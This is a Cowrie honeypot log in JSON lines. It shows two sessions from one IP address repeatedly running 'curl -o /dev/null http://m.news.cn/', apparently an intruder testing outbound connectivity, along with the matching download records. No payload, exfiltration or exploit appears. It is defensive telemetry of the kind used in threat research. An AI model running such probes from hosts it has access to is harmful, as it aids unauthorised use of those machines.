{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.939440Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.951961Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.953103Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.957323Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.976740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.977995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.992376Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:59.993960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:59.996034Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.019302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.020566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.029031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.035073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.036339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.048409Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.058804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.059841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.069738Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.071990Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.072673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.097205Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.098409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.112931Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.114587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.121754Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.131304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.139227Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.140417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.146208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.150813Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.151784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.182927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.184381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.185657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.192380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.193745Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.195951Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.211161Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.221400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.225875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.226986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.230402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.231428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.253017Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.265333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.266471Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.271595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.272567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.277976Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.284698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.307558Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.308809Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.314043Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.315090Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.316638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.331912Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.351979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.352857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.356942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.358245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.374037Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.390934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.392059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.395724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.396849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.420912Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.437737Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.438827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.442953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.444102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.454013Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.464354Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.465980Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.477841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.479314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.482442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.483511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.497358Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.508782Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.516903Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.517781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.520198Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.521866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.532038Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.541406Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.555643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
